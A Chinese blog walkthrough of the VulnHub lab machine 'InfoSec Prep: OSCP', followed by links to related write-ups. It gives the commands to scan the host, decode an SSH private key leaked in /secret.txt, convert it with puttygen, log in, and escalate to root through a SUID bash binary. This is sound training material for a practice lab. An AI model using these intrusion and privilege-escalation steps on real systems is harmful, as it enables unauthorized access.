vulnhub InfoSec Prep: OSCP

最新推荐文章于 2024-01-31 11:39:43 发布
最新推荐文章于 2024-01-31 11:39:43 发布
阅读量690 收藏 1
点赞数 2
分类专栏: vulnhub 文章标签: puttygen 私钥格式 curl tr sed
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/126274562
版权

渗透思路:

nmap扫描端口 ---- 网站默认页面提示系统用户名 ---- /secret.txt中发现base64加密的私钥 ---- 转换私钥格式 ---- bash suid提权

环境信息:

靶机:192.168.101.96

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.96

扫描到tcp 22、80、33060端口

2、网站默认页面提示系统用户名

浏览器访问http://192.168.101.96/发现提示:本靶机唯一用户名为oscp

Oh yea! Almost forgot the only user on this box is “oscp”.

3、/secret.txt中发现base64加密的私钥

仔细观察nmap扫描结果,发现网站有robots.txt文件,其中包含/secret.txt

浏览器访问http://192.168.101.96/secret.txt,发现一段base64编码的文本

如果直接复制这段文本解码,解码后会有多余的换行。可以用以下两个方法进行解码,以得到没有多余换行的文本。

方法1:利用tr和sed

先将网页上的文本复制粘贴,保存为文件b64,然后执行如下命令,先将换行转换为空格,再去掉空格,最后再base64解码

cat b64 | tr '\n' ' ' | sed 's/ //g' | base64 -d

方法2:利用curl

直接curl获取网页内容,然后base64解码

curl http://192.168.101.96/secret.txt | base64 -d

得到的结果和方法1一样的,就不截图了

4、转换私钥格式

将上一步中的结果保存为private

修改private权限为0600

chmod 0600 private

尝试ssh登录

ssh oscp@192.168.101.96 -i private

结果登录失败,显示private的格式不正确

Load key "private": invalid format

百度了一下END OPENSSH PRIVATE KEY,发现转换格式的方法:ssh-keygen 生成的key以“BEGIN OPENSSH PRIVATE KEY”开头_盖世英雄呀的博客-CSDN博客

命令行执行

puttygen private -o tempkey.ppk
puttygen tempkey.ppk -O private-openssh -o id_rsa

此时id_rsa如下

再次尝试ssh登录

ssh oscp@192.168.101.96 -i id_rsa

登录成功

5、bash suid提权

查看所有有suid权限的命令,发现bash有suid权限

find / -user root -perm /4000 2>/dev/null

输入如下命令提权到root,并在/root下发现flag.txt

bash -p

仙女象
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
infosec-writeups:我在信息安全过程中不断收集的有用资源的档案
03-07
信息sec-upups 我在信息安全过程中不断收集的有用资源的档案 有用的资源 恶意软件分析和逆向工程一角 恶意软件来源 -Play市场和社区的样本。 技巧 -流行规避技术的详尽描述。 工具 -Python对象的RPC代理。 -FireEye Labs混淆了字符串求解器。 威胁情报角 资源 -开发为共享威胁搜寻概念的开源项目。 搜索引擎和数据存档。 -OSINT引擎,用于搜索人员。 -各种OSINT工具和脚本。 -包含TI工具和技术的广泛存储库。 很棒的折衷指标集合(以及一些与IOC相关的工具)。 威胁搜索引擎。 -致力于从免费工具或资源中收集信息的项目。 提要 带有状态检查的免费供稿列表。 每日供稿,仅包含全球范围内的相关事件。 一个滥用项目,旨在共享恶意URL。 勒索-一个滥用项目,旨在共享勒索软件指标(已停产)。 [Feodo Tracker]
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 shell 和绑定 shell 之间的区别。 用它做很多实验。 Ncat:...
vulhub靶场学习日记infosecprep-oscp
m0_55763479的博客
08-24 398
vulhub靶场学习日记infosecprep-oscp
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 643
secret.txt获得ssh私钥,suid提权
vulhub上oscp InfoSec靶机渗透测试writeup
qq_44635376的博客
02-05 634
这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的
PG::InfosecPrep
aya3t的博客
12-16 104
PROVING GROUNDS::InfosecPrep
infosec:信息安全博客
05-19
信息安全 该项目是2018年Spring期间CS 166(信息安全)的一个长期项目。如果您想了解实际的项目,请访问: : 关于 要了解有关项目幕后的更多信息,请访问幕后页面
infosec-test:Infosec测试库
04-13
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
infosec-scripts:一些InfoSec脚本
03-03
信息脚本一些InfoSec脚本ARP_Network_Scanner.py 通过ARP请求(使用Scapy软件包)在本地网络中扫描活动主机。ARP_Spoof.py 通过伪造的ARP响应欺骗受害者的ARP缓存(使用Scapy软件包)。 为欺骗提供目标(通过IP或MAC...
词表:Infosec词表
02-05
词表 杂项 ( 324个字) ( 570字) ( 179个字) ( 3,619字) ( 100个字) ( 134个字) ( 109个字) ( 4'213字) 模式 ( 28个字) 辞典 巴西az-( 204'448字) 巴西人( 71'054个字) ... a
Vulnhub-OSCP靶机实战
御七彩虹猫
05-10 2215
Vulnhub-OSCP靶机实战
OSCP练习:vulhub靶机TR0LL 1攻略
weixin_47311099的博客
04-13 269
信息收集 主机发现 nmap -sC -sV 192.168.8.132 发现21、22、80端口 网站信息收集 访问80端口,没啥有用信息 访问ftp 使用 Anonymous 匿名用户登录,密码为空。发现lol.pcap文件 下载lol.pacp文件 在downloads中发现lol.pcap下载成功 使用wireshark打开lol.pcap 对ftp流量包进行分析 首先使用Anonymous登录ftp服务器,syst命令获取系统版本为unix type l8 接下来又尝试访问10.0.0
oscp——SecOS: 1
王嘟嘟的博客
03-01 1484
0x00 目标资料 38 链接 https://www.vulnhub.com/entry/secos-1,88/ 难度推荐 3 思路 1 web——usershell 1 usershell——rootshell 1 环境搭建 VMbox 0x01 信息收集 IP 端口 0x02 Web——Usershell 拿到之后,访问一下8081端口 然后看到一个注册的界面,进行用户的注册,...
OSCP系列靶场-Esay-InfosecPrep保姆级
杳若的博客
08-17 1609
OSCP系列靶场-Esay-InfosecPrep
InfoSec Prep--vulnhub靶机渗透
qq_74240553的博客
01-22 894
vulnhub靶场
红队打靶练习:INFOSEC PREP: OSCP
最新发布
分享
01-31 992
红队打靶练习:INFOSEC PREP: OSCP !! 很简单!最多五分钟结束!
windows下使用tftp工具下载文件到开发板(linux)
cry1994的专栏
08-25 4208
1.下载tftp工具,也可以上CSDN找个免费0积分的 http://www.52z.com/soft/11886.html 2.确保开发板和windows在同一网段   开发板通过命令行ifconfig eth0:1 192.168.101.96设置 windows可如图添加地址段 2.安装/打开tftp工具 通过Browse设置目录,把要下载的文件放到这个目录下
利用BIND+DLZ+MYSQL构建企业智能DNS
weixin_33836874的博客
01-09 1209
目录:一、简介二、服务规划三、安装BIND及基本环境四、配置Bind-View-DLZ-MYSQL五、添加相关记录并进行测试六、配置从DNS七、本文以FreeBSD 10.2 stable系统为例一、简介:1、智能DNS(Bind-view):智能DNS 原理很简单:在用户解析一个域名的时候的,判断一下用户使用的IP,然后跟DNS 服务器内部的IP 表匹配一下,看看用户是电信...
OSCP 备考破解靶机系列
kevinhanser
02-18 3301
测试的 VM 主机主要来源 www.vulnhub.com VM - Lazysysadmin 的破解
java.security.NoSuchProviderException: JCE cannot authenticate the provider INFOSEC
07-28
这个异常表示 Java 加密扩展(JCE)无法验证提供者 INFOSEC 的身份。可能是由于以下原因之一导致的: 1. INFOSEC 提供者不存在:请确保 INFOSEC 提供者已正确安装和配置到 Java 运行时环境中。 2. 提供者 JAR 文件缺失或损坏:检查提供者的 JAR 文件是否存在且完整,如果有损坏的情况,请重新下载或修复。 3. 未正确配置 Java 安全策略文件:确保 Java 安全策略文件中已正确配置 INFOSEC 提供者的权限和许可。 4. 版本不兼容:确认 INFOSEC 提供者与 Java 运行时环境的版本兼容性。某些提供者可能需要特定的 Java 版本才能正常工作。 请根据具体情况进行逐一排查,并采取相应的解决方法来解决该异常。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值